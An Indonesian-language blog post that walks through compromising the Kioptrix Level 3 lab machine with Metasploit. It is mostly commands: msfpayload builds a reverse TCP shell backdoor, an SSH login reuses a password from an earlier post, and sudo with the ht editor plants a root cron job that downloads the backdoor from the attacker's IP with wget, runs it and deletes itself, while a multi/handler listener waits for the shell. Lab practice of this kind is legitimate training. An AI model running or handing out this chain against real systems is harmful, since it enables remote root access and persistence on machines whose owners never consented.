Pada Pentest kali ini, saya akan mendemonstrasikan menyerang web server yang menggunakan Ubuntu dengan Metasploit.
Note: IP address saya 192.168.1.2
Preparation:
1. Metasploit ---> Download Page
Briefing:
1. Buat backdoor
2. Buat Script untuk mendownload backdoor yang sudah kita buat
3. Jalankan exploit multi handler dan Game Over
Walkthrough:
1. Buat backdoor
Buka terminal, lalu masukan perintah:
root@red-dragon:# cd /pentest/exploits/framework2
root@red-dragon:/pentest/exploits/framework2# msfpayload -p linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /var/www/back.door
2. Buat Script untuk mendownload backdoor yang sudah kita buat
Buka terminal, lalu masukan perintah:
Code:
root@red-dragon:/pentest/exploits/framework2# ssh loneferret@kioptrix3.com
Masukan password.
Note: Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User
Kemudian
Code:
loneferret@kioptrix3:~$ sudo ht
Pada console ht, tekan atl+f kemudian pilih new
Masukan kode berikut:
Code:
* * * * * root cd /tmp/; wget 192.168.1.2/back.door && chmod +x && ./back.door; rm /etc/cron.d/exploit
Tekan alt+f kemudian pilih save, dan masukan nama file dengan nama /etc/cron.d/exploitBuka terminal masukan perintah:
root@red-dragon:/pentest/exploits/framework2# msfcli multi/handler PAYLOAD=linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 E
Tunggu sejanak.. Daaaaaaaan..
Created:
red-dragon
Supported by:
Bule Dragon
Loved by:
Yoshephine Handini
Sumber:
HN-COMMUNITY
0 comments:
Post a Comment